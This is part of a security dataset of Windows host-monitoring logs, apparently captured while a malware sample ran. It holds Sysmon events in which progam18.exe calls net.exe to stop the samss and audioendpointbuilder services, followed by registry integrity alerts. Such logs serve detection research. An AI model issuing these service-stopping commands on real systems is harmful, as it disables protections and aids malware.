12:37:39.050",9,"Windows Application error event","""Faulting application name: sihost.exe, version: 10.0.18362.1, time stamp: 0xe9587576 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xcf8 +Faulting application start time: 0x01d6303b4d8c5702 +Faulting application path: C:\Windows\system32\sihost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 79787ffd-717a-4b83-93f1-c28f8f7e0903 +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:37:34.505",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:26.163 +ProcessGuid: {df9fc3d3-d15e-5ec7-0000-0010809c1900} +ProcessId: 3376 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d15e-5ec7-0000-00104c941900} +ParentProcessId: 4540 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:26.170507600Z"",""eventRecordID"":""951"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:26.163\r\nProcessGuid: {df9fc3d3-d15e-5ec7-0000-0010809c1900}\r\nProcessId: 3376\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d15e-5ec7-0000-00104c941900}\r\nParentProcessId: 4540\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:26.163"",""processGuid"":""{df9fc3d3-d15e-5ec7-0000-0010809c1900}"",""processId"":""3376"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d15e-5ec7-0000-00104c941900}"",""parentProcessId"":""4540"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:37:34.495",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:26.113 +ProcessGuid: {df9fc3d3-d15e-5ec7-0000-001060981900} +ProcessId: 3476 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001099821900} +ParentProcessId: 5356 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:26.128239200Z"",""eventRecordID"":""950"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:26.113\r\nProcessGuid: {df9fc3d3-d15e-5ec7-0000-001060981900}\r\nProcessId: 3476\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001099821900}\r\nParentProcessId: 5356\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:26.113"",""processGuid"":""{df9fc3d3-d15e-5ec7-0000-001060981900}"",""processId"":""3476"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001099821900}"",""parentProcessId"":""5356"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:37:34.480",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:26.074 +ProcessGuid: {df9fc3d3-d15e-5ec7-0000-00104c941900} +ProcessId: 4540 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:26.078154100Z"",""eventRecordID"":""949"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:26.074\r\nProcessGuid: {df9fc3d3-d15e-5ec7-0000-00104c941900}\r\nProcessId: 4540\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:26.074"",""processGuid"":""{df9fc3d3-d15e-5ec7-0000-00104c941900}"",""processId"":""4540"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:37:34.457",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:25.860 +ProcessGuid: {df9fc3d3-d15d-5ec7-0000-001099821900} +ProcessId: 5356 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:25.897778800Z"",""eventRecordID"":""948"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:25.860\r\nProcessGuid: {df9fc3d3-d15d-5ec7-0000-001099821900}\r\nProcessId: 5356\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:25.860"",""processGuid"":""{df9fc3d3-d15d-5ec7-0000-001099821900}"",""processId"":""5356"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" diff --git a/data/MW_19_HIDS_1.csv b/data/MW_19_HIDS_1.csv new file mode 100644 index 0000000..ee90139 --- /dev/null +++ b/data/MW_19_HIDS_1.csv @@ -0,0 +1,375 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 6, 2020 @ 08:44:28.387",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)", +"Apr 6, 2020 @ 08:44:25.012",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'", +"Apr 6, 2020 @ 08:43:17.166",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '93c2f688a68bea92ca0316b543b731f9' +New md5sum is : 'b0b97338469d0e4b1f413fb4b548b967' +Old sha1sum was: '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +New sha1sum is : '7ccab140b78da4c4fffa98afdc0dad438217f06e' +" +"Apr 6, 2020 @ 08:43:17.151",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a0df8d6e879d924da3288b2aa0b85114' +New md5sum is : '8084f544981f665891455fa614c559c8' +Old sha1sum was: '5b3369bb152c26552a26be399f0ea043686a36fe' +New sha1sum is : '6879876f2270cbe6cf155dc44930db270fbb0d41' +" +"Apr 6, 2020 @ 08:43:13.683",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2af29' was added. +" +"Apr 6, 2020 @ 08:43:13.667",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:43:06.824",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '729d0877659e4797d3983fddb4576047' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '109945df285ffff37e08eaab1d91e55cb59c26c8' +" +"Apr 6, 2020 @ 08:43:06.776",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'c0405481b74cf6174a880af1ccc1d4b0' +New md5sum is : 'a95a4c0a8e5f7b405ff8eb5c4b437bc5' +Old sha1sum was: 'b7d4bb4d3cde4fa21584725503c78a8e4d7d6788' +New sha1sum is : 'da15a1a2d8cc2b5edf6ac520096edd2d505a36a6' +" +"Apr 6, 2020 @ 08:43:06.760",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '3bed6b4b8101da842bb6afe04a8271c2' +New md5sum is : 'eb74d772fb247effed22679195324ed4' +Old sha1sum was: '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +New sha1sum is : 'ede60f5480a0a2f75b669872a6b32a27d174730b' +" +"Apr 6, 2020 @ 08:43:06.027",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'a6934418b12b085c34f2dbaa9e9fa7a0' +New md5sum is : '36e6a5b67014cb81a360a5f2a9e804df' +Old sha1sum was: 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +New sha1sum is : 'ccf4c3faa9df7387844fd44d8215f29ce5a05d82' +" +"Apr 6, 2020 @ 08:43:04.682",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '5b06acdc8ed6732e0719fab302999091' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'a4fa3b6743a44afa0d4ad52e2b3d1fc14c834bde' +" +"Apr 6, 2020 @ 08:43:04.432",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 'b132e65b4963a54ebee91bcab8914621' +New md5sum is : '61f3946e9ba274598130f5d593a8ba6d' +Old sha1sum was: '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +New sha1sum is : '728202215cd7499d863da7b762352efe5c25a4af' +" +"Apr 6, 2020 @ 08:43:03.869",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:43:03.854",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:43:03.729",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'f6949813e6b9d992278b95b7f209e047' +New md5sum is : '13761060e702fe0b2aa32f46d7d75863' +Old sha1sum was: '8db1fc943f83c30b4bc07f1ed394492c392e7722' +New sha1sum is : '1ad862be5c095dacfc993e3834d975af6909452f' +" +"Apr 6, 2020 @ 08:43:03.510",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '342765c52f3fd7b50e5188adb30a0ede' +New md5sum is : 'a831ea2c98f083cbaf2c24795ba188c6' +Old sha1sum was: '6d803f7cc7de0ae861402e45b8a1442595a4b544' +New sha1sum is : '6d6612e0d9bdeb41b67a06af336d0f8a6571cd4d' +" +"Apr 6, 2020 @ 08:43:03.088",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:43:03.072",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:43:02.526",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '5b06acdc8ed6732e0719fab302999091' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'a4fa3b6743a44afa0d4ad52e2b3d1fc14c834bde' +" +"Apr 6, 2020 @ 08:43:00.603",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'bb30a4865d0fe96a2d7b53b843e8fa0a' +New md5sum is : '5478e7278a1f89c75335d7fd8f30e597' +Old sha1sum was: '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +New sha1sum is : '0f7abad7f06c8fcae527dd315e0f53fd7d6ea74d' +" +"Apr 6, 2020 @ 08:42:55.166",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 08:42:55.150",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +" +"Apr 6, 2020 @ 08:42:52.963",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : '671078222c6f28f8a987ef233af7d5a5' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'c62d69328b5a046dd8494e6a38df8074f8310102' +" +"Apr 6, 2020 @ 08:42:52.948",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '728627011eedd28411cf4e1f2a30d1ca' +New md5sum is : 'e7da235d7443b87ea4d5d1ef32857357' +Old sha1sum was: '26576187b3bbee39309e7ebe95de85749ea7b9d2' +New sha1sum is : 'c355c6c799dda0b3767d88f9d370687b8dcadb06' +" +"Apr 6, 2020 @ 08:42:48.526",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +" +"Apr 6, 2020 @ 08:42:46.620",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:42:46.603",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:46.058",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:42:46.041",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:44.370",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:42:44.354",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:41.714",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '6b263e7f7f9f5df60b5ba6c86e1d3e84' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '2b734daaadaeb6ce4fae48d91f5494165ca31e14' +" +"Apr 6, 2020 @ 08:42:40.057",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : '45b4950ff29c20f4bd9965865008a1c3' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : '47513d7b2f94ec1a09f92dd2777575f49cdf29e6' +" +"Apr 6, 2020 @ 08:42:39.119",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' 